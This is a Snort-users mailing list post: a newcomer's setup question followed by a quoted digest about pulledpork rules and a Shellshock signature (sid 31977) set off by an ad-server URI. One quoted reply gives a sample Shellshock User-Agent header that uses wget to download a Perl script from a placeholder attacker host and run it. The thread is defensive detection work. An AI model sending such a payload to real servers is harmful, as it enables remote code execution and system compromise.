[Snort-users] Snort-users Digest, Vol 106, Issue 16

Anthony Gallina anthonygallina1 at ...11827...
Fri Mar 6 01:15:05 EST 2015


Hello I am a newbie to snort. I am on a Ubuntu 14.04 system and trying to
get Snort, Barnyard2, Pulledpork, BASE to work. It looks like snort is out
putting u2 files that look like binary code. Pulled pork is pulling new
rules. BASE is up but not showing any traffic. But it doesn’t seem like
barnyard2 is logging to my MySQL that is running local on Apache 2. Is it
possible to get assistance with this? Or should I just lurk for a while and
see if I can figure out whats going on? And sorry to mix my introduction
with a problem : (

On Thu, Mar 5, 2015 at 5:54 AM, <snort-users-request at lists.sourceforge.net>
wrote:

> Send Snort-users mailing list submissions to
>         snort-users at lists.sourceforge.net
>
> To subscribe or unsubscribe via the World Wide Web, visit
>         https://lists.sourceforge.net/lists/listinfo/snort-users
> or, via email, send a message with subject or body 'help' to
>         snort-users-request at lists.sourceforge.net
>
> You can reach the person managing the list at
>         snort-users-owner at lists.sourceforge.net
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Snort-users digest..."
>
>
> When responding, please don't respond with the entire Digest.  Please trim
> your response.
>
> Today's Topics:
>
>    1. Re: need assistance - no so rules with pulled pork
>       (Al Lewis (allewi))
>    2. Re: need assistance - no so rules with pulled pork
>       (Joel Esler (jesler))
>    3. Re: ShellShock Signatures (Colin Edwards)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Thu, 5 Mar 2015 12:12:46 +0000
> From: "Al Lewis (allewi)" <allewi at ...589...>
> Subject: Re: [Snort-users] need assistance - no so rules with pulled
>         pork
> To: Rata Pelua <intesnetmiosolo at ...11827...>,
>         "snort-users at lists.sourceforge.net"
>         <snort-users at lists.sourceforge.net>
> Message-ID:
>         <789F50FCB3014340B798E7CD25851FBE05D596DE at ...17064...>
> Content-Type: text/plain; charset="utf-8"
>
> For .so rules:
> http://vrt-blog.snort.org/2009/01/using-vrt-certified-shared-object-rules.html
>
> To run snort in IDS mode you need to add ?-c? and point to a conf file so
> it can load the preprocessors:
>
> http://manual.snort.org/node6.html
>
>
>
> Hope this helps.
>
>
> Albert Lewis
> QA Software Engineer
> SOURCEfire, Inc. now part of Cisco
> 9780 Patuxent Woods Drive
> Columbia, MD 21046
> Phone: (office) 443.430.7112
> Email: allewi at ...589...
>
> From: Rata Pelua [mailto:intesnetmiosolo at ...11827...]
> Sent: Wednesday, March 04, 2015 6:49 AM
> To: snort-users at lists.sourceforge.net
> Subject: [Snort-users] need assistance - no so rules with pulled pork
>
>
> Hi Everybody,
>
>
> I'm having different issues when I have tried to configure pulledpork in
> my raspberry pi (Raspbian) ,
> Firstly , it didn't generate the snort.rules , but I tried several times,
> tried to check the pulledpork.conf
> rename the path file, and after it, It successfully generated the
> snort.rules but not the .so rules ...
>
> please, Is there anybody that it can help me?
>
> Also, I would like to activate the predecessor for port scan, I have tried
> to include a code in the snort.conf file (since 426-447) but when I ran
> snort -b
>
> I got a warning:
>
> WARNING: No preprocessors configured for policy 0.
>
>
>
> Attached there are my pulledpork.conf and snort.conf files, and output in
> -verbose mode .
>
> Thank you in advance,
> Atai
>
>
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 2
> Date: Thu, 5 Mar 2015 12:25:58 +0000
> From: "Joel Esler (jesler)" <jesler at ...589...>
> Subject: Re: [Snort-users] need assistance - no so rules with pulled
>         pork
> To: Rata Pelua <intesnetmiosolo at ...11827...>
> Cc: "snort-users at lists.sourceforge.net"
>         <snort-users at lists.sourceforge.net>
> Message-ID: <221E9D49-6DFB-4067-A6E7-615FE8755CB6 at ...589...>
> Content-Type: text/plain; charset="us-ascii"
>
> What OS do you have on the pi?
>
> --
> Joel Esler
> Sent from my iPhone
>
> On Mar 5, 2015, at 6:43 AM, Rata Pelua <intesnetmiosolo at ...11827...<mailto:
> intesnetmiosolo at ...11827...>> wrote:
>
>
> Hi Everybody,
>
>
> I'm having different issues when I have tried to configure pulledpork in
> my raspberry pi (Raspbian) ,
> Firstly , it didn't generate the snort.rules , but I tried several times,
> tried to check the pulledpork.conf
> rename the path file, and after it, It successfully generated the
> snort.rules but not the .so rules ...
>
> please, Is there anybody that it can help me?
>
> Also, I would like to activate the predecessor for port scan, I have tried
> to include a code in the snort.conf file (since 426-447) but when I ran
> snort -b
>
> I got a warning:
>
> WARNING: No preprocessors configured for policy 0.
>
>
>
> Attached there are my pulledpork.conf and snort.conf files, and output in
> -verbose mode .
>
> Thank you in advance,
> Atai
>
>
> <snort.conf>
> <pulledpork.conf>
> <rules!->
> <verbosemode_noSOrules>
>
> ------------------------------------------------------------------------------
> Dive into the World of Parallel Programming The Go Parallel Website,
> sponsored
> by Intel and developed in partnership with Slashdot Media, is your hub for
> all
> things parallel software development, from weekly thought leadership blogs
> to
> news, videos, case studies, tutorials and more. Take a look and join the
> conversation now. http://goparallel.sourceforge.net/
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net<mailto:Snort-users at lists.sourceforge.net
> >
> Go to this URL to change user options or unsubscribe:
> https://lists.sourceforge.net/lists/listinfo/snort-users
> Snort-users list archive:
> http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users
>
> Please visit http://blog.snort.org to stay current on all the latest
> Snort news!
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 3
> Date: Thu, 5 Mar 2015 08:54:07 -0500
> From: Colin Edwards <colin.p.edwards at ...11827...>
> Subject: Re: [Snort-users] ShellShock Signatures
> To: "Joel Esler (jesler)" <jesler at ...589...>
> Cc: "snort-users at lists.sourceforge.net"
>         <snort-users at lists.sourceforge.net>
> Message-ID:
>         <CAJX8fKzA8b793o1v32euNP_7LA3=
> 0br9nm1ydML6-YtMA4bymg at ...11828...>
> Content-Type: text/plain; charset="utf-8"
>
> The URI that is being alerted on is
> /ad/sacbee.jsp?loc=sbp_sbw_ros_ros_mediumbox&fmt=&fmtpos=
> &keyw=&jsfuncstart=(function()%20{%20var%20adagioAsyncParams={%22ap%22:
> true,%22ph%22:%22mainstage-free-html%22};&jsfunc=})();&
> jsfuncno=//})();&rlp=&rnd=267194691727
>
> That URI is in an HTTP GET request coming from the host inside our network,
> and that GET happens immediately after browsing to sacbee.com.  After a
> little more research, it looks like this is being caused by some Ad server
> running on their web server, and it's not trying to execute any shell
> commands.
>
> At the moment, we're using the base policy "Balanced Security and
> Connectivity", and have not made any modifications to it.  So, the rule for
> 1:31977 is:
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"OS-OTHER Bash
> CGI environment variable injection attempt"; flow:to_server,established;
> content:"() {"; fast_pattern:only; http_uri; metadata:policy balanced-ips
> drop, policy security-ips drop, ruleset community, service http;
> reference:cve,2014-6271; reference:cve,2014-6277; reference:cve,2014-6278;
> reference:cve,2014-7169; classtype:attempted-admin; sid:31977; rev:4; )
>
> It's pretty clear that "() {" is in the URI, so that makes sense why it
> triggered.  I'm a little unclear on $EXTERNAL_NET vs $HOME_NET right now,
> and why the rule is triggered on the outbound traffic (although it is good
> to know there's no malicious traffic originating from our network).  I need
> to look into that...maybe something we missed during initial configuration.
>
> The pcap of the packet that generated the alert is attached.
>
> Thanks,
> Colin
>
>
> On Tue, Mar 3, 2015 at 11:57 AM, Joel Esler (jesler) <jesler at ...589...>
> wrote:
>
> >  We made a blog post back when this came out on the details of the
> > vulnerability here:
> >
> >
> http://vrt-blog.snort.org/2014/09/shellshock-update-bash-immediately.html
> >
> >
> >  --
> > *Joel Esler*
> > Open Source Manager
> > Threat Intelligence Team Lead
> > Talos Group
> >
> >   On Mar 3, 2015, at 11:37 AM, s0ups . <ynots0ups at ...11827...> wrote:
> >
> >   On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <
> colin.p.edwards at ...11827...
> > > wrote:
> >
> >> Hello Snort Users,
> >>
> >>  I'm a new list member, and happy to say that I've been working with
> >> Firesight and a couple of ASA-X Firepower modules for almost a week now.
> >> This is my first time hands-on w/ an IPS/IDS.  I'm here because I found
> >> this message from this list while researching an alert:
> >> http://sourceforge.net/p/snort/mailman/message/32980285/ .  I had a
> user
> >> viewing a newspaper's website today, and I received an alert for
> 1:31977.
> >> I actually wasn't familiar with the domain name, and just searching for
> the
> >> domain I saw in the alert in Google also generated an alert from my
> >> workstation (I assume something to do with Google pulling news/images to
> >> display in the results?).  The URI from the request does have "() {" in
> it,
> >> so that's why it was triggered, but I don't know if it's a False
> Positive
> >> alert.  The website was for the Sacramento Bee (www.sacbee.com).  I can
> >> provide more detail from the pcap / URI when I'm back in the office
> >> tomorrow.
> >>
> >>
> >>  While I'm introducing myself as a snort newbie...If anyone has any
> >> recommendations for other resources or reading material, feel free to
> >> message me off-list.
> >>
> >>  Cheers,
> >> Colin Edwards
> >> CISSP, GCIH, GCWN, GSEC, MCSE
> >>
> >>
> >  Yo Colin,
> >
> > As you probably know, Shellshock attacks attempt to exploit environment
> > variables that use user-provided data. The attacks are pretty easy to
> > identify as they usually have some recognizable commands after the "() {
> > :;};". I've actually hardly, if ever, see 1:31977 in my environment as
> the
> > majority of the legit hits I see target HTTP header fields (so 1:31978 is
> > more common) like so:
> >      GET /cgi-bin/possiblevulnerablescript.cgi
> >      User-Agent: () { :;}; /bin/bash -c "cd /var/tmp;wget
> > http://attackerwebsite/maliciousperlcode;perl maliciousperlcode
> >
> > Fireeye has a good explanation and illustration of the various attack
> > methods seen for the Shellshock vulnerability which will give you a good
> > idea on what the common attacks look like. (
> >
> https://www.fireeye.com/blog/threat-research/2014/09/shellshock-in-the-wild.html
> > )
> >
> >  Chances are if it's an HTTP response from an external webserver to a
> > client browser than it's a FP and poses little to no threat. I'd be
> > interested in checking out the URI if you want to send it to me.
> >
> >  - s0ups
> >
> > On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <colin.p.edwards at ...13704......
> >
> > wrote:
> >
> >> Hello Snort Users,
> >>
> >>  I'm a new list member, and happy to say that I've been working with
> >> Firesight and a couple of ASA-X Firepower modules for almost a week now.
> >> This is my first time hands-on w/ an IPS/IDS.  I'm here because I found
> >> this message from this list while researching an alert:
> >> http://sourceforge.net/p/snort/mailman/message/32980285/ .  I had a
> user
> >> viewing a newspaper's website today, and I received an alert for
> 1:31977.
> >> I actually wasn't familiar with the domain name, and just searching for
> the
> >> domain I saw in the alert in Google also generated an alert from my
> >> workstation (I assume something to do with Google pulling news/images to
> >> display in the results?).  The URI from the request does have "() {" in
> it,
> >> so that's why it was triggered, but I don't know if it's a False
> Positive
> >> alert.  The website was for the Sacramento Bee (www.sacbee.com).  I can
> >> provide more detail from the pcap / URI when I'm back in the office
> >> tomorrow.
> >>
> >>
> >>  While I'm introducing myself as a snort newbie...If anyone has any
> >> recommendations for other resources or reading material, feel free to
> >> message me off-list.
> >>
> >>  Cheers,
> >> Colin Edwards
> >> CISSP, GCIH, GCWN, GSEC, MCSE
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> Dive into the World of Parallel Programming The Go Parallel Website,
> >> sponsored
> >> by Intel and developed in partnership with Slashdot Media, is your hub
> >> for all
> >> things parallel software development, from weekly thought leadership
> >> blogs to
> >> news, videos, case studies, tutorials and more. Take a look and join the
> >> conversation now. http://goparallel.sourceforge.net/
> >> _______________________________________________
> >> Snort-users mailing list
> >> Snort-users at lists.sourceforge.net
> >> Go to this URL to change user options or unsubscribe:
> >> https://lists.sourceforge.net/lists/listinfo/snort-users
> >> Snort-users list archive:
> >> http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users
> >>
> >> Please visit http://blog.snort.org to stay current on all the latest
> >> Snort news!
> >>
> >
> >
> >
> ------------------------------------------------------------------------------
> > Dive into the World of Parallel Programming The Go Parallel Website,
> > sponsored
> > by Intel and developed in partnership with Slashdot Media, is your hub
> for
> > all
> > things parallel software development, from weekly thought leadership
> blogs
> > to
> > news, videos, case studies, tutorials and more. Take a look and join the
> > conversation now.
> >
> http://goparallel.sourceforge.net/_______________________________________________
> > Snort-users mailing list
> > Snort-users at lists.sourceforge.net
> > Go to this URL to change user options or unsubscribe:
> > https://lists.sourceforge.net/lists/listinfo/snort-users
> > Snort-users list archive:
> > http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users
> >
> > Please visit http://blog.snort.org to stay current on all the latest
> > Snort news!
> >
> >
> >
> -------------- next part --------------
> An HTML attachment was scrubbed...
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: packet.pcap
> Type: application/octet-stream
> Size: 1298 bytes
> Desc: not available
>
> ------------------------------
>
>
> ------------------------------------------------------------------------------
> Dive into the World of Parallel Programming The Go Parallel Website,
> sponsored
> by Intel and developed in partnership with Slashdot Media, is your hub for
> all
> things parallel software development, from weekly thought leadership blogs
> to
> news, videos, case studies, tutorials and more. Take a look and join the
> conversation now. http://goparallel.sourceforge.net/
>
> ------------------------------
>
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-users
>
>
> End of Snort-users Digest, Vol 106, Issue 16
> ********************************************
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20150305/90ce22a0/attachment.html>


More information about the Snort-users mailing list